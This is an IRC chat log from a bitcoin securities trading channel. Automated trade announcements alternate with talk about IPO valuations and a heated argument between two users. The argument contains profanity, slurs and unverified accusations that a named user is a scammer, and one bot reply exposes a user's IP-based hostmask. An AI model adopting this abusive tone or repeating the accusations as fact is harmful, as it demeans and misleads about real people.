0.016 = 4.8 BTC [-] Aug 01 06:31:56 Namworld: ROFL Aug 01 06:31:57 [BTCTC] [BTCGARDEN] 50 @ 0.016 = 0.8 BTC [-] Aug 01 06:31:59 you know what you are a fucking weirdo Aug 01 06:31:59 [BTCTC] [BTCGARDEN] 150 @ 0.016 = 2.4 BTC [-] Aug 01 06:32:00 yep namworld, disgraceful isn't it? Aug 01 06:32:02 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [-] Aug 01 06:32:04 [BTCTC] [TAT.ASICMINER] 74 @ 0.04001 = 2.9607 BTC [-] Aug 01 06:32:04 so, "around", but not in a meaningful way? no registration of nick, no registration in otc? Aug 01 06:32:05 [BTCTC] [BTCGARDEN] 534 @ 0.016 = 8.544 BTC [-] Aug 01 06:32:06 VanCleef yeah. Aug 01 06:32:07 [BTCTC] [TAT.ASICMINER] 43 @ 0.04001 = 1.7204 BTC [-] Aug 01 06:32:07 [BTCTC] [BTCGARDEN] 6000 @ 0.016 = 96 BTC [-] Aug 01 06:32:11 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [-] Aug 01 06:32:14 mircea_popescu: what am i even wasting my time arguing with a cunt like you for Aug 01 06:32:14 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [-] Aug 01 06:32:16 [BTCTC] [BTCGARDEN] 1200 @ 0.016 = 19.2 BTC [-] Aug 01 06:32:20 [BTCTC] [BTCGARDEN] 1375 @ 0.016 = 22 BTC [-] Aug 01 06:32:22 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [-] Aug 01 06:32:25 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [-] Aug 01 06:32:25 as if you'd even remove my name if i proved you wrong??? Aug 01 06:32:26 [BTCTC] [ASICMINER-PT] 1 @ 4.116 BTC [-] Aug 01 06:32:30 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [-] Aug 01 06:32:33 [BTCTC] [BTCGARDEN] 300 @ 0.016 = 4.8 BTC [-] Aug 01 06:32:33 pizza_deliveri because your time isn't worth anything, basically. and because you're trying to learn, in your own retarded way. Aug 01 06:32:34 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [-] Aug 01 06:32:37 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [-] Aug 01 06:32:40 [BTCTC] [BTCGARDEN] 13770 @ 0.016 = 220.32 BTC [-] Aug 01 06:32:43 i think your the type of person who would alwys conjure up some excuse even after proved wrong Aug 01 06:32:43 [BTCTC] [BTCGARDEN] 115 @ 0.016 = 1.84 BTC [-] Aug 01 06:32:46 [BTCTC] [BTCGARDEN] 250 @ 0.016 = 4 BTC [-] Aug 01 06:32:48 [BTCTC] [BTCGARDEN] 2500 @ 0.016 = 40 BTC [-] Aug 01 06:32:49 No love for the serious businesses that have been around since forever. Aug 01 06:32:51 [BTCTC] [BTCGARDEN] 800 @ 0.016 = 12.8 BTC [-] Aug 01 06:32:54 pizza_deliveri actually that flies in the face of the record. Aug 01 06:32:54 [BTCTC] [BTCGARDEN] 2661 @ 0.016 = 42.576 BTC [-] Aug 01 06:32:55 wasn't it a 19 million dollar valuation? Aug 01 06:32:57 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [-] Aug 01 06:32:59 [BTCTC] [TAT.ASICMINER] 22 @ 0.04001 = 0.8802 BTC [-] Aug 01 06:32:59 so forgive me ignorance. but how does one find when IPOs are about to happen? Aug 01 06:33:01 [BTCTC] [BTCGARDEN] 250 @ 0.016 = 4 BTC [-] Aug 01 06:33:03 [BTCTC] [BTCGARDEN] 1150 @ 0.016 = 18.4 BTC [-] Aug 01 06:33:06 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [-] Aug 01 06:33:09 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [-] Aug 01 06:33:10 Wild0wnes they watch boiler room, it's a film. Aug 01 06:33:11 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [-] Aug 01 06:33:15 [BTCTC] [BTCGARDEN] 15002 @ 0.016 = 240.032 BTC [-] Aug 01 06:33:15 mircea_popescu: there is always people like you in the world..love to make drama where there is none Aug 01 06:33:16 [BTCTC] [LABCOIN] 340 @ 0.0035 = 1.19 BTC [-] Aug 01 06:33:17 i thought so Aug 01 06:33:18 [BTCTC] [BTCGARDEN] 10550 @ 0.016 = 168.8 BTC [-] Aug 01 06:33:19 then they get friendly with the scammer pushing it, early on. Aug 01 06:33:21 [BTCTC] [BTCGARDEN] 85 @ 0.016 = 1.36 BTC [-] Aug 01 06:33:24 [BTCTC] [BTCGARDEN] 450 @ 0.016 = 7.2 BTC [-] Aug 01 06:33:26 [BTCTC] [BTCGARDEN] 1084 @ 0.016 = 17.344 BTC [-] Aug 01 06:33:28 [BTCTC] [BTCGARDEN] 1090 @ 0.016 = 17.44 BTC [-] Aug 01 06:33:29 you and your weird alter egos Aug 01 06:33:30 Thankfully I'm starting to get private offers which are decent and not related to these awful IPOs Aug 01 06:33:30 [BTCTC] [BTCGARDEN] 2200 @ 0.016 = 35.2 BTC [-] Aug 01 06:33:31 bitcointalk securites subforum Aug 01 06:33:32 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [-] Aug 01 06:33:36 [BTCTC] [BTCGARDEN] 5000 @ 0.016 = 80 BTC [-] Aug 01 06:33:37 Wild0wnes, bitcointalk forums Aug 01 06:33:42 pizza_deliveri recourse to generalities won't help you. that crap has nothing to do wiuth the discussion at hand. Aug 01 06:33:46 but even then its a shot in the dark basically Aug 01 06:33:49 as we've seen today Aug 01 06:33:56 [BTCTC] [LABCOIN] 346 @ 0.0035 = 1.211 BTC [-] Aug 01 06:33:57 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [-] Aug 01 06:33:59 mircea_popescu: why do you fake a PR profile pretending to be a woman? Aug 01 06:34:01 [BTCTC] [BTCGARDEN] 1500 @ 0.016 = 24 BTC [-] Aug 01 06:34:04 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [-] Aug 01 06:34:07 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [-] Aug 01 06:34:11 [BTCTC] [BTCGARDEN] 150 @ 0.016 = 2.4 BTC [-] Aug 01 06:34:14 [BTCTC] [BTCGARDEN] 125 @ 0.016 = 2 BTC [-] Aug 01 06:34:16 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [-] Aug 01 06:34:19 [BTCTC] [BTCGARDEN] 11 @ 0.016 = 0.176 BTC [-] Aug 01 06:34:20 flyingleap: I just use random nicks like 'useraiaiaoo' you and your weird alter egos Aug 01 06:34:22 [BTCTC] [BTCGARDEN] 768 @ 0.016 = 12.288 BTC [-] Aug 01 06:34:25 [BTCTC] [LABCOIN] 563 @ 0.003545 = 1.9958 BTC [+] Aug 01 06:34:26 [BTCTC] [BTCGARDEN] 6160 @ 0.016 = 98.56 BTC [-] Aug 01 06:34:29 [BTCTC] [ASICMINER-PT] 2 @ 4.115 = 8.23 BTC [-] Aug 01 06:34:31 [BTCTC] [BTCGARDEN] 7 @ 0.016 = 0.112 BTC [-] Aug 01 06:34:31 pizza_deliveri lol dude, you're embarassing yourself. everyone here knows it's an actual woman. half the people met her ffs. Aug 01 06:34:32 pizza_deliveri: The PR person is real. Aug 01 06:34:34 [BTCTC] [BTCGARDEN] 300 @ 0.016 = 4.8 BTC [-] Aug 01 06:34:36 [BTCTC] [LABCOIN] 40 @ 0.0035 = 0.14 BTC [-] Aug 01 06:34:37 [BTCTC] [BTCGARDEN] 7290 @ 0.016 = 116.64 BTC [-] Aug 01 06:34:39 so what? I don't usually even talk on IRC Aug 01 06:34:40 [BTCTC] [BTCGARDEN] 6000 @ 0.016 = 96 BTC [-] Aug 01 06:34:41 thank you afrotec Aug 01 06:34:42 [BTCTC] [BTCGARDEN] 166 @ 0.016 = 2.656 BTC [-] Aug 01 06:34:45 [BTCTC] [BTCGARDEN] 332 @ 0.016 = 5.312 BTC [-] Aug 01 06:34:49 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [-] Aug 01 06:34:50 :(( Aug 01 06:34:50 [BTCTC] [TAT.ASICMINER] 27 @ 0.04001 = 1.0803 BTC [-] Aug 01 06:34:51 i just randomly come here and see you accusing me of being some scammer? Aug 01 06:34:54 [BTCTC] [BTCGARDEN] 458 @ 0.016 = 7.328 BTC [-] Aug 01 06:34:55 [BTCTC] [LABCOIN] 1274 @ 0.0035 = 4.459 BTC [-] Aug 01 06:34:55 orly./ Aug 01 06:34:57 [BTCTC] [ASICMINER-PT] 1 @ 4.112 BTC [-] Aug 01 06:34:59 [BTCTC] [BTCGARDEN] 129 @ 0.016 = 2.064 BTC [-] Aug 01 06:35:03 pizza_deliveri: you're drunk go home Aug 01 06:35:05 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [-] Aug 01 06:35:06 do you think sec will investigate btct after all this? Aug 01 06:35:06 mircea_popescu: yes REALLY Aug 01 06:35:13 I'm like 99.999% sure MPOE-PR is real. Aug 01 06:35:20 VanCleef in the quaint words of the virgin mary, fucking definitely. Aug 01 06:35:24 I've traded with few guys before their nicks? they like to leave a record of that for building rep u know Aug 01 06:35:26 good Aug 01 06:35:30 i was right then Aug 01 06:35:32 [BTCTC] [BTCGARDEN] 335 @ 0.016 = 5.36 BTC [-] Aug 01 06:35:36 [BTCTC] [BTCGARDEN] 6000 @ 0.016 = 96 BTC [-] Aug 01 06:35:37 :) Aug 01 06:35:41 [BTCTC] [BTCGARDEN] 700 @ 0.016 = 11.2 BTC [-] Aug 01 06:35:44 [BTCTC] [BTCGARDEN] 310 @ 0.016 = 4.96 BTC [-] Aug 01 06:35:48 [BTCTC] [BTCGARDEN] 377 @ 0.016 = 6.032 BTC [-] Aug 01 06:35:50 [BTCTC] [BTCGARDEN] 25000 @ 0.016 = 400 BTC [-] Aug 01 06:35:50 omg Aug 01 06:35:52 [BTCTC] [BTCGARDEN] 23 @ 0.016 = 0.368 BTC [-] Aug 01 06:35:55 [BTCTC] [BTCGARDEN] 2900 @ 0.016 = 46.4 BTC [-] Aug 01 06:35:57 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [-] Aug 01 06:36:00 [BTCTC] [BTCGARDEN] 830 @ 0.016 = 13.28 BTC [-] Aug 01 06:36:01 [BTCTC] [BTCGARDEN] 55 @ 0.016 = 0.88 BTC [-] Aug 01 06:36:04 [BTCTC] [BTCGARDEN] 30 @ 0.016 = 0.48 BTC [-] Aug 01 06:36:06 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [-] Aug 01 06:36:07 mircea_popescu: rest assured karma will come to you for playing weird games like this Aug 01 06:36:09 [BTCTC] [BTCGARDEN] 1200 @ 0.016 = 19.2 BTC [-] Aug 01 06:36:11 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [-] Aug 01 06:36:13 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [-] Aug 01 06:36:15 [BTCTC] [BTCGARDEN] 313 @ 0.016 = 5.008 BTC [-] Aug 01 06:36:17 [BTCTC] [BTCGARDEN] 1900 @ 0.016 = 30.4 BTC [-] Aug 01 06:36:19 [BTCTC] [BTCGARDEN] 90 @ 0.016 = 1.44 BTC [-] Aug 01 06:36:21 [BTCTC] [BTCGARDEN] 400 @ 0.016 = 6.4 BTC [-] Aug 01 06:36:23 [BTCTC] [BTCGARDEN] 37 @ 0.016 = 0.592 BTC [-] Aug 01 06:36:26 [BTCTC] [BTCGARDEN] 865 @ 0.016 = 13.84 BTC [-] Aug 01 06:36:28 [BTCTC] [BTCGARDEN] 1880 @ 0.016 = 30.08 BTC [-] Aug 01 06:36:30 [BTCTC] [BTCGARDEN] 12450 @ 0.016 = 199.2 BTC [-] Aug 01 06:36:31 it does come to me. i get everything i ever want because i'm the sort of guy that won't go for the quick buck. Aug 01 06:36:32 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [-] Aug 01 06:36:33 [BTCTC] [BTCGARDEN] 2543 @ 0.016 = 40.688 BTC [-] Aug 01 06:36:35 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [-] Aug 01 06:36:37 [BTCTC] [BTCGARDEN] 1900 @ 0.016 = 30.4 BTC [-] Aug 01 06:36:38 mircea_popescu: it's just weird, why would you do it? Aug 01 06:36:39 [BTCTC] [BTCGARDEN] 80 @ 0.016 = 1.28 BTC [-] Aug 01 06:36:41 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [-] Aug 01 06:36:43 [BTCTC] [BTCGARDEN] 2000 @ 0.016 = 32 BTC [-] Aug 01 06:36:43 where do you live? Aug 01 06:36:44 [BTCTC] [BTCGARDEN] 2000 @ 0.016 = 32 BTC [-] Aug 01 06:36:47 because i just don't like scammers. Aug 01 06:36:48 [BTCTC] [BTCGARDEN] 2000 @ 0.016 = 32 BTC [-] Aug 01 06:36:50 [BTCTC] [BTCGARDEN] 1012 @ 0.016 = 16.192 BTC [-] Aug 01 06:36:51 it's realyl that simple. Aug 01 06:36:52 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [-] Aug 01 06:36:54 [BTCTC] [BTCGARDEN] 138 @ 0.016 = 2.208 BTC [-] Aug 01 06:36:56 [BTCTC] [BTCGARDEN] 600 @ 0.016 = 9.6 BTC [-] Aug 01 06:36:58 [BTCTC] [BTCGARDEN] 735 @ 0.016 = 11.76 BTC [-] Aug 01 06:36:58 mircea_popescu: you are deluded Aug 01 06:37:00 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [-] Aug 01 06:37:02 [BTCTC] [BTCGARDEN] 50 @ 0.016 = 0.8 BTC [-] Aug 01 06:37:04 [BTCTC] [BTCGARDEN] 2480 @ 0.016 = 39.68 BTC [-] Aug 01 06:37:06 [BTCTC] [BTCGARDEN] 3000 @ 0.016 = 48 BTC [-] Aug 01 06:37:07 Question to all, what would prevent BTCGARDEN to crash considering they're IPOing for 4 million shares at 0.016 or more when there's demand for only about 250k? Aug 01 06:37:08 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [-] Aug 01 06:37:09 sick in the head as has been said before...no smoke without fire Aug 01 06:37:13 [BTCTC] [BTCGARDEN] 25 @ 0.016 = 0.4 BTC [-] Aug 01 06:37:15 [BTCTC] [BTCGARDEN] 5900 @ 0.016 = 94.4 BTC [-] Aug 01 06:37:18 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [-] Aug 01 06:37:21 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [-] Aug 01 06:37:22 okay so what i'm seeing with BTC garden... a script again? Aug 01 06:37:23 [BTCTC] [BTCGARDEN] 95 @ 0.016 = 1.52 BTC [-] Aug 01 06:37:26 [BTCTC] [BTCGARDEN] 150 @ 0.016 = 2.4 BTC [-] Aug 01 06:37:28 [BTCTC] [ASICMINER-PT] 1 @ 4.15 BTC [+] Aug 01 06:37:29 [BTCTC] [BTCGARDEN] 400 @ 0.016 = 6.4 BTC [-] Aug 01 06:37:30 ;;calc 4000000 * 0.016 Aug 01 06:37:30 64000 Aug 01 06:37:32 It's not even going to fulfill the IPO Aug 01 06:37:32 pizza_deliveri mind giving a link or something ? where "has it been said before" ? Aug 01 06:37:34 [BTCTC] [BTCGARDEN] 1140 @ 0.016 = 18.24 BTC [-] Aug 01 06:37:37 jeeze Aug 01 06:37:47 !ticker btctc btcgarden Aug 01 06:37:48 [BTCT:BTCGARDEN] 1D: 0.016 / 0.01601 / 0.01633 (226840 shares, 3630.7 BTC), 7D: 0.016 / 0.01601 / 0.01633 (223437 shares, 3576.3 BTC), 30D: 0.016 / 0.01601 / 0.01633 (223437 shares, 3576.3 BTC) Aug 01 06:37:50 mircea_popescu: you've never noticed it? your type rarely do Aug 01 06:37:53 and that 4 million shares is for 40% of the profits ONLY Aug 01 06:37:55 [BTCTC] [BTCGARDEN] 82 @ 0.016 = 1.312 BTC [-] Aug 01 06:37:57 [BTCTC] [TAT.ASICMINER] 44 @ 0.04189 = 1.8432 BTC [+] Aug 01 06:38:01 [BTCTC] [BTCGARDEN] 124 @ 0.016 = 1.984 BTC [-] Aug 01 06:38:02 [BTCTC] [LABCOIN] 580 @ 0.003155 = 1.8299 BTC [-] Aug 01 06:38:03 pizza_deliveri forget the generalities, back up yiour claim. link, where ? Aug 01 06:38:04 [BTCTC] [BTCGARDEN] 23 @ 0.016 = 0.368 BTC [-] Aug 01 06:38:05 [BTCTC] [LABCOIN] 60 @ 0.003151 = 0.1891 BTC [-] Aug 01 06:38:07 [BTCTC] [BTCGARDEN] 36 @ 0.016 = 0.576 BTC [-] Aug 01 06:38:09 [BTCTC] [LABCOIN] 1000 @ 0.003101 = 3.101 BTC [-] Aug 01 06:38:11 [BTCTC] [BTCGARDEN] 1680 @ 0.016 = 26.88 BTC [-] Aug 01 06:38:12 [BTCTC] [LABCOIN] 4016 @ 0.0031 = 12.4496 BTC [-] Aug 01 06:38:14 [BTCTC] [BTCGARDEN] 311 @ 0.016 = 4.976 BTC [-] Aug 01 06:38:15 [BTCTC] [LABCOIN] 20 @ 0.0031 = 0.062 BTC [-] Aug 01 06:38:15 For some random out of the blue chinese operation Aug 01 06:38:16 [BTCTC] [BTCGARDEN] 7 @ 0.01601 = 0.1121 BTC [+] Aug 01 06:38:18 [BTCTC] [LABCOIN] 1000 @ 0.00301 = 3.01 BTC [-] Aug 01 06:38:20 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [-] Aug 01 06:38:22 [BTCTC] [LABCOIN] 20 @ 0.00301 = 0.0602 BTC [-] Aug 01 06:38:23 [BTCTC] [BTCGARDEN] 2400 @ 0.016 = 38.4 BTC [-] Aug 01 06:38:25 [BTCTC] [LABCOIN] 75 @ 0.003 = 0.225 BTC [-] Aug 01 06:38:25 mircea_popescu: this is the weirdest thing Aug 01 06:38:26 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [-] Aug 01 06:38:26 [BTCTC] [LABCOIN] 200 @ 0.003 = 0.6 BTC [-] Aug 01 06:38:27 [BTCTC] [BTCGARDEN] 13 @ 0.016 = 0.208 BTC [-] Aug 01 06:38:28 who are you even?? Aug 01 06:38:29 [BTCTC] [LABCOIN] 463 @ 0.002951 = 1.3663 BTC [-] Aug 01 06:38:30 [BTCTC] [BTCGARDEN] 425 @ 0.016 = 6.8 BTC [-] Aug 01 06:38:31 [BTCTC] [LABCOIN] 1031 @ 0.00295 = 3.0415 BTC [-] Aug 01 06:38:32 [BTCTC] [BTCGARDEN] 5000 @ 0.016 = 80 BTC [-] Aug 01 06:38:34 [BTCTC] [BTCGARDEN] 3500 @ 0.016 = 56 BTC [-] Aug 01 06:38:35 [BTCTC] [LABCOIN] 608 @ 0.00291 = 1.7693 BTC [-] Aug 01 06:38:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.0419 BTC [+] Aug 01 06:38:38 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [-] Aug 01 06:38:38 i'm your worst fucking nightmare. Aug 01 06:38:39 [BTCTC] [LABCOIN] 1200 @ 0.00288 = 3.456 BTC [-] Aug 01 06:38:39 [BTCTC] [TAT.ASICMINER] 15 @ 0.0419 = 0.6285 BTC [+] Aug 01 06:38:40 [BTCTC] [BTCGARDEN] 600 @ 0.016 = 9.6 BTC [-] Aug 01 06:38:41 [BTCTC] [LABCOIN] 20 @ 0.00281 = 0.0562 BTC [-] Aug 01 06:38:43 looool Aug 01 06:38:44 so is anyone else here beside me and mp who didnt buy labcoin ipo at all? Aug 01 06:38:48 [BTCTC] [LABCOIN] 165 @ 0.0028 = 0.462 BTC [-] Aug 01 06:38:49 [BTCTC] [BTCGARDEN] 50 @ 0.016 = 0.8 BTC [-] Aug 01 06:38:50 [BTCTC] [BTCGARDEN] 300 @ 0.016 = 4.8 BTC [-] Aug 01 06:38:50 omg are you for real,,,,,, Aug 01 06:38:59 this is too much Aug 01 06:39:00 kakobrekla wait, you missed out ?!!?!?!?!?! Aug 01 06:39:02 [BTCTC] [LABCOIN] 185 @ 0.0028 = 0.518 BTC [-] Aug 01 06:39:03 [BTCTC] [BTCGARDEN] 300 @ 0.016 = 4.8 BTC [-] Aug 01 06:39:05 [BTCTC] [BTCGARDEN] 689 @ 0.016 = 11.024 BTC [-] Aug 01 06:39:06 [BTCTC] [LABCOIN] 1 @ 0.0028 BTC [-] Aug 01 06:39:07 [BTCTC] [BTCGARDEN] 1900 @ 0.016 = 30.4 BTC [-] Aug 01 06:39:08 [BTCTC] [LABCOIN] 5000 @ 0.0027 = 13.5 BTC [-] Aug 01 06:39:09 apparently! Aug 01 06:39:12 i bought it at its peak Aug 01 06:39:12 [BTCTC] [LABCOIN] 1200 @ 0.0027 = 3.24 BTC [-] Aug 01 06:39:13 [BTCTC] [ASICMINER-PT] 1 @ 4.112 BTC [-] Aug 01 06:39:17 [BTCTC] [LABCOIN] 3156 @ 0.00266 = 8.395 BTC [-] Aug 01 06:39:17 did you really use 'im your worst nightmare' Aug 01 06:39:18 Wild0wnes wd! Aug 01 06:39:18 i like to do things different Aug 01 06:39:29 mircea_popescu: karma will come to you Aug 01 06:39:29 kakobrekla, i havent Aug 01 06:39:31 Wild0wnes they say karma helps traders that buy at peaks. Aug 01 06:39:32 FRIEDCAT DELIVERED ON 200'000 SHARES AT $1 A PIECE (0.1 BTC) BACK IN 2012! $200'000 RAISED ONLY AND HE DELIVERED! Aug 01 06:39:32 [BTCTC] [LABCOIN] 500 @ 0.003489 = 1.7445 BTC [+] Aug 01 06:39:36 playing these weird games Aug 01 06:39:37 [BTCTC] [TAT.ASICMINER] 72 @ 0.04193 = 3.019 BTC [+] Aug 01 06:39:38 [BTCTC] [ASICMINER-PT] 2 @ 4.112 = 8.224 BTC [-] Aug 01 06:39:44 [BTCTC] [ASICMINER-PT] 5 @ 4.111 = 20.555 BTC [-] Aug 01 06:39:44 I've told you simple- wrong guy Aug 01 06:39:44 THOSE IPOs ARE COMPLETE RIPOFFS Aug 01 06:39:45 Namworld: where is that from? Aug 01 06:39:49 [BTCTC] [ASICMINER-PT] 1 @ 4.111 BTC [-] Aug 01 06:39:52 satoshi dice helped me last time Aug 01 06:39:53 I don't work for labcoin or whatever shit you conjured up Aug 01 06:40:00 [BTCTC] [ACTIVEMINING] 25 @ 0.006246 = 0.1562 BTC [-] Aug 01 06:40:01 [BTCTC] [ACTIVEMINING] 61 @ 0.006245 = 0.3809 BTC [-] Aug 01 06:40:03 thestringpuller history, actually Aug 01 06:40:04 Namworld, you're more effective when you don't shout Aug 01 06:40:08 so take my name of your little blog.. Aug 01 06:40:14 oh yea on GLBSE Aug 01 06:40:20 harhar Aug 01 06:40:22 you can put my name on your blog Aug 01 06:40:23 yeh Aug 01 06:40:23 Thestringpuller, that's what ASICMINER IPOed for. Aug 01 06:40:23 [BTCTC] [BTCGARDEN] 14000 @ 0.016 = 224 BTC [-] Aug 01 06:40:24 [BTCTC] [ASICMINER-PT] 2 @ 4.112 = 8.224 BTC [+] Aug 01 06:40:30 [BTCTC] [BTCGARDEN] 300 @ 0.016 = 4.8 BTC [-] Aug 01 06:40:35 200'000 USD for 50% of the company Aug 01 06:40:35 Wild0wnes why ty. Aug 01 06:40:36 [BTCTC] [BTCGARDEN] 91 @ 0.016 = 1.456 BTC [-] Aug 01 06:40:38 haha Aug 01 06:40:49 strange guy hope you get caught one day and taught some manners Aug 01 06:40:51 [BTCTC] [BTCGARDEN] 512 @ 0.016 = 8.192 BTC [-] Aug 01 06:40:52 BTCGARDEN is asking for over 6 million for 40% of the company Aug 01 06:40:59 Graet how does it feel to have missed out! Aug 01 06:41:04 ;;calc 4.12 * 200000 * 2 Aug 01 06:41:04 1648000 Aug 01 06:41:05 [BTCTC] [ACTIVEMINING] 3 @ 0.006399 = 0.0192 BTC [+] Aug 01 06:41:17 pizza_deliveri o, you gonna mess me up, scammer toughboy ? Aug 01 06:41:18 so asicminer's general valuation is like 1.6 mn? Aug 01 06:41:30 16 million dollar valuation Aug 01 06:41:32 heh Aug 01 06:41:36 mircea_popescu: can you answer me serious question.. for real here Aug 01 06:41:37 [BTCTC] [BTCGARDEN] 2000 @ 0.016 = 32 BTC [-] Aug 01 06:41:41 [BTCTC] [LABCOIN] 100 @ 0.0034 = 0.34 BTC [-] Aug 01 06:41:42 1.6 million BTC! Aug 01 06:41:43 dont really care mircea_popescu , i rarely buy and sell thios sort of stuff Aug 01 06:41:46 [BTCTC] [BTCGARDEN] 250 @ 0.016 = 4 BTC [-] Aug 01 06:41:49 oh 1.6 million btc Aug 01 06:41:51 GEEZ Aug 01 06:41:52 [BTCTC] [BTCGARDEN] 25 @ 0.016 = 0.4 BTC [-] Aug 01 06:41:55 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [-] Aug 01 06:41:56 Graet yeah. Aug 01 06:41:59 amusing to watch tho, all the butthurt lol Aug 01 06:41:59 [BTCTC] [BTCGARDEN] 23 @ 0.016 = 0.368 BTC [-] Aug 01 06:42:03 indeed. Aug 01 06:42:03 [BTCTC] [BTCGARDEN] 2 @ 0.016 = 0.032 BTC [-] Aug 01 06:42:09 160 million valuation for ASICMINER Aug 01 06:42:09 [BTCTC] [ACTIVEMINING] 25 @ 0.006397 = 0.1599 BTC [-] Aug 01 06:42:09 mircea_popescu: If i gave you some sure proof I am completely unrelated to labcoin or whatever story you got, would you remove my name? Aug 01 06:42:10 [BTCTC] [BTCGARDEN] 150 @ 0.016 = 2.4 BTC [-] Aug 01 06:42:16 [BTCTC] [BTCGARDEN] 5 @ 0.016 = 0.08 BTC [-] Aug 01 06:42:19 you can't prove a negative dumbass. Aug 01 06:42:21 [BTCTC] [BTCGARDEN] 180 @ 0.016 = 2.88 BTC [-] Aug 01 06:42:26 thats my answer Aug 01 06:42:26 start small. back up some of the claims you've made so far. Aug 01 06:42:26 [BTCTC] [BTCGARDEN] 100 @ 0.015 = 1.5 BTC [-] Aug 01 06:42:27 [BTCTC] [BASIC-MINING] 1 @ 0.4014 BTC [-] Aug 01 06:42:30 though o you fucking cunt Aug 01 06:42:32 [BTCTC] [BTCGARDEN] 66 @ 0.016 = 1.056 BTC [+] Aug 01 06:42:33 the positive stuff. being here in 2010. that. Aug 01 06:42:34 wow it's getting exciting in here Aug 01 06:42:38 [BTCTC] [ACTIVEMINING] 244 @ 0.00639 = 1.5592 BTC [-] Aug 01 06:42:38 [BTCTC] [BTCGARDEN] 2 @ 0.016 = 0.032 BTC [+] Aug 01 06:42:39 even if i give u proof you still not gonna remove it Aug 01 06:42:43 [BTCTC] [BTCGARDEN] 310 @ 0.016 = 4.96 BTC [+] Aug 01 06:42:47 two IPOs and the flaming Aug 01 06:42:48 [BTCTC] [LABCOIN] 100 @ 0.003 = 0.3 BTC [-] Aug 01 06:42:49 [BTCTC] [BTCGARDEN] 50 @ 0.016 = 0.8 BTC [+] Aug 01 06:42:50 you clown.... what sort of person are you??? Aug 01 06:42:56 herpderp Aug 01 06:42:57 They've been paying out over 500'000 USD weekly Aug 01 06:42:59 i show you proof and that not gonna be enough for you Aug 01 06:43:06 so basically you just wanna play games?? Aug 01 06:43:08 [BTCTC] [ACTIVEMINING] 25 @ 0.006389 = 0.1597 BTC [-] Aug 01 06:43:09 thats what it is Aug 01 06:43:09 That makes it fair for such a high valuation. Aug 01 06:43:10 [BTCTC] [BTCGARDEN] 2 @ 0.016 = 0.032 BTC [+] Aug 01 06:43:16 [BTCTC] [BTCGARDEN] 6 @ 0.016 = 0.096 BTC [+] Aug 01 06:43:17 fucking always some idiots like you Aug 01 06:43:18 pizza_deliveri a. you didn't show any proof ; b. you can't prove a negative ; c. stop trying to pass a duck for a doe, it doesn't wash. Aug 01 06:43:27 what the hell is wrong with you Aug 01 06:43:36 you? Aug 01 06:43:39 'can't prove a negative' Aug 01 06:43:41 lol Aug 01 06:43:43 [BTCTC] [BTCGARDEN] 4 @ 0.016 = 0.064 BTC [+] Aug 01 06:43:44 hey so what does everyone use to get their millions converted to benjamins..... i only lost 10 bucks today... i'm gonna splurge Aug 01 06:43:45 [BTCTC] [LABCOIN] 1 @ 0.00311 BTC [+] Aug 01 06:43:46 [BTCTC] [ACTIVEMINING] 25 @ 0.006389 = 0.1597 BTC [-] Aug 01 06:43:47 the novelty of basic logic. Aug 01 06:43:48 [BTCTC] [LABCOIN] 25 @ 0.00339 = 0.0848 BTC [+] Aug 01 06:43:50 [BTCTC] [ACTIVEMINING] 225 @ 0.00639 = 1.4378 BTC [+] Aug 01 06:43:51 [BTCTC] [BTCGARDEN] 1 @ 0.01501 BTC [-] Aug 01 06:43:55 [BTCTC] [LABCOIN] 914 @ 0.003399 = 3.1067 BTC [+] Aug 01 06:43:57 [BTCTC] [BTCGARDEN] 18 @ 0.016 = 0.288 BTC [+] Aug 01 06:44:03 [BTCTC] [BTCGARDEN] 1001 @ 0.016 = 16.016 BTC [+] Aug 01 06:44:04 ;;ident Wild0wnes Aug 01 06:44:05 Nick 'Wild0wnes', with hostmask 'Wild0wnes!~Wild0wnes@ip68-0-74-27.tu.ok.cox.net', is not identified. Aug 01 06:44:08 [BTCTC] [BTCGARDEN] 420 @ 0.016 = 6.72 BTC [+] Aug 01 06:44:09 Namworld: sorry to ask again, but when does BITVPS monthly's come out again? Aug 01 06:44:10 [BTCTC] [LABCOIN] 100 @ 0.00285 = 0.285 BTC [-] Aug 01 06:44:11 may be an idea to get in the wot, since we're here Aug 01 06:44:13 [BTCTC] [BTCGARDEN] 1 @ 0.016 